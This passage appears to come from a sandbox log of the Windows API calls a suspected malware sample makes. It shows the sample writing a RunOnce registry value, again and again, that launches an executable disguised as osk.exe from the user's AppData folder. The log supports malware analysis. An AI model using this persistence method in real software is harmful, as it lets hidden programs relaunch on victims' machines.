returned 61 [0092.448] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.449] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.449] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.449] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.449] RegCloseKey (hKey=0x280) returned 0x0 [0092.449] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.449] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.449] SetTimer (hWnd=0x20280, nIDEvent=0x21fd, uElapse=0xa, lpTimerFunc=0x0) returned 0x21fd [0092.449] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.451] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.451] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.451] KillTimer (hWnd=0x20280, uIDEvent=0x21fd) returned 1 [0092.451] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.453] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.453] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.453] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.453] RegCloseKey (hKey=0x280) returned 0x0 [0092.453] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.453] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.453] SetTimer (hWnd=0x20280, nIDEvent=0x21fe, uElapse=0xa, lpTimerFunc=0x0) returned 0x21fe [0092.453] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.467] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.467] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.467] KillTimer (hWnd=0x20280, uIDEvent=0x21fe) returned 1 [0092.467] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.468] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.468] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.468] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.468] RegCloseKey (hKey=0x280) returned 0x0 [0092.468] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.468] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.468] SetTimer (hWnd=0x20280, nIDEvent=0x21ff, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ff [0092.468] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.482] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.482] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.482] KillTimer (hWnd=0x20280, uIDEvent=0x21ff) returned 1 [0092.483] ISystemDebugEventFire:IsActive 
(This=0x7b4480) returned 0x1 [0092.483] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.483] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.483] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.483] RegCloseKey (hKey=0x280) returned 0x0 [0092.484] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.484] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.484] SetTimer (hWnd=0x20280, nIDEvent=0x2200, uElapse=0xa, lpTimerFunc=0x0) returned 0x2200 [0092.484] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.498] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.498] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.498] KillTimer (hWnd=0x20280, uIDEvent=0x2200) returned 1 [0092.498] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.499] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.499] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.499] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.499] RegCloseKey 
(hKey=0x280) returned 0x0 [0092.499] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.499] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.499] SetTimer (hWnd=0x20280, nIDEvent=0x2201, uElapse=0xa, lpTimerFunc=0x0) returned 0x2201 [0092.499] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.514] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.514] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.514] KillTimer (hWnd=0x20280, uIDEvent=0x2201) returned 1 [0092.515] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.515] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.515] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.515] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.516] RegCloseKey (hKey=0x280) returned 0x0 [0092.516] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.516] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.516] SetTimer (hWnd=0x20280, nIDEvent=0x2202, uElapse=0xa, lpTimerFunc=0x0) returned 0x2202 [0092.516] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.529] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.529] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.529] KillTimer (hWnd=0x20280, uIDEvent=0x2202) returned 1 [0092.530] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.530] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) 
returned 0 [0092.530] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.530] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.531] RegCloseKey (hKey=0x280) returned 0x0 [0092.531] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.531] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.531] SetTimer (hWnd=0x20280, nIDEvent=0x2203, uElapse=0xa, lpTimerFunc=0x0) returned 0x2203 [0092.531] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.545] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.545] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.545] KillTimer (hWnd=0x20280, uIDEvent=0x2203) returned 1 [0092.545] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.546] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.546] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.546] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.546] RegCloseKey (hKey=0x280) returned 0x0 [0092.546] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.546] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.546] SetTimer (hWnd=0x20280, nIDEvent=0x2204, uElapse=0xa, lpTimerFunc=0x0) returned 0x2204 [0092.546] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.561] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.561] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.561] KillTimer (hWnd=0x20280, uIDEvent=0x2204) returned 1 [0092.561] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.562] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.562] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.562] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.562] RegCloseKey (hKey=0x280) returned 0x0 [0092.562] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.562] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.562] SetTimer (hWnd=0x20280, nIDEvent=0x2205, uElapse=0xa, lpTimerFunc=0x0) returned 0x2205 [0092.562] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.576] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.576] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.576] KillTimer (hWnd=0x20280, uIDEvent=0x2205) returned 1 [0092.576] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.577] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.577] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.577] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.577] RegCloseKey (hKey=0x280) returned 0x0 [0092.577] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.577] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.578] SetTimer (hWnd=0x20280, nIDEvent=0x2206, uElapse=0xa, lpTimerFunc=0x0) returned 0x2206 [0092.578] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.599] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.599] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.599] KillTimer (hWnd=0x20280, uIDEvent=0x2206) returned 1 [0092.600] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.600] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.600] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.601] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.601] RegCloseKey (hKey=0x280) returned 0x0 [0092.601] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.601] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0092.601] SetTimer (hWnd=0x20280, nIDEvent=0x2207, uElapse=0xa, lpTimerFunc=0x0) returned 0x2207 [0092.601] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.607] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.607] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.607] KillTimer (hWnd=0x20280, uIDEvent=0x2207) returned 1 [0092.607] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.608] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.608] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.608] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.608] RegCloseKey (hKey=0x280) returned 0x0 [0092.608] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.609] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.609] SetTimer (hWnd=0x20280, nIDEvent=0x2208, uElapse=0xa, lpTimerFunc=0x0) returned 0x2208 [0092.609] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.623] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.623] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.623] KillTimer (hWnd=0x20280, uIDEvent=0x2208) returned 1 [0092.623] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.624] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.624] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.624] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.624] RegCloseKey (hKey=0x280) returned 0x0 [0092.624] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.624] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.624] SetTimer (hWnd=0x20280, nIDEvent=0x2209, uElapse=0xa, lpTimerFunc=0x0) returned 0x2209 [0092.624] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.640] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.640] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.640] KillTimer (hWnd=0x20280, uIDEvent=0x2209) returned 1 [0092.640] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.641] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.641] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.641] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.641] RegCloseKey (hKey=0x280) returned 0x0 [0092.641] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.641] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.641] SetTimer (hWnd=0x20280, nIDEvent=0x220a, uElapse=0xa, lpTimerFunc=0x0) returned 0x220a 
[0092.641] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.654] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.654] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.654] KillTimer (hWnd=0x20280, uIDEvent=0x220a) returned 1 [0092.654] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.655] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.655] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.655] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.655] RegCloseKey (hKey=0x280) returned 0x0 [0092.655] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.655] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.655] SetTimer (hWnd=0x20280, nIDEvent=0x220b, uElapse=0xa, lpTimerFunc=0x0) returned 0x220b [0092.656] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.669] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.669] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.670] KillTimer (hWnd=0x20280, uIDEvent=0x220b) returned 1 [0092.670] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.670] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.670] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.671] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.671] RegCloseKey (hKey=0x280) returned 0x0 [0092.671] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.671] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.671] SetTimer (hWnd=0x20280, nIDEvent=0x220c, uElapse=0xa, lpTimerFunc=0x0) returned 0x220c [0092.671] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.685] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.685] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.685] KillTimer (hWnd=0x20280, uIDEvent=0x220c) returned 1 [0092.685] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.686] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.686] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.686] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.686] RegCloseKey (hKey=0x280) returned 0x0 [0092.686] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.686] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.686] SetTimer (hWnd=0x20280, nIDEvent=0x220d, uElapse=0xa, lpTimerFunc=0x0) returned 0x220d [0092.686] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0092.701] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.701] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.701] KillTimer (hWnd=0x20280, uIDEvent=0x220d) returned 1 [0092.701] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.701] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.702] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.702] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.702] RegCloseKey (hKey=0x280) returned 0x0 [0092.702] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.702] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.702] SetTimer (hWnd=0x20280, nIDEvent=0x220e, uElapse=0xa, lpTimerFunc=0x0) returned 0x220e [0092.702] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.716] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.716] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.717] KillTimer (hWnd=0x20280, uIDEvent=0x220e) returned 1 [0092.717] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.717] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.717] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.718] RegSetValueExA (in: 
